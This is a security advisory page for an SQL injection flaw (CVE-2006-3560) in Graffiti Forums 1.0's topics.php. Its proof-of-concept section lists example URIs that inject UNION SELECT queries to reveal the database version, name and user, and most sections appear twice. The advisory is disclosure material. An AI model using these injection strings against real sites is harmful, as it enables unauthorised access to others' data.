Graffiti Forums Topics.PHP SQL Injection Vulnerability
BID:18928
CVE-2006-3560 |Info
Graffiti Forums Topics.PHP SQL Injection Vulnerability
| Bugtraq ID: | 18928 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-3560 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 10 2006 12:00AM |
| Updated: | Sep 16 2008 02:10PM |
| Credit: | paisterist has been credited with the discovery of this vulnerability. |
| Vulnerable: |
Blue Dojo Graffiti Forums 1.0 |
| Not Vulnerable: | |
Discussion
Graffiti Forums Topics.PHP SQL Injection Vulnerability
Graffiti Forums is prone to an SQL-injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Graffiti Forums is prone to an SQL-injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Graffiti Forums Topics.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/topics.php?f=-1 union all select version()--
http://www.example.com/topics.php?f=-1 union ll select database()--
http://www.example.com/topics.php?f=-1 union all select user()--
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/topics.php?f=-1 union all select version()--
http://www.example.com/topics.php?f=-1 union ll select database()--
http://www.example.com/topics.php?f=-1 union all select user()--
Solution / Fix
Graffiti Forums Topics.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Graffiti Forums Topics.PHP SQL Injection Vulnerability
References:
References: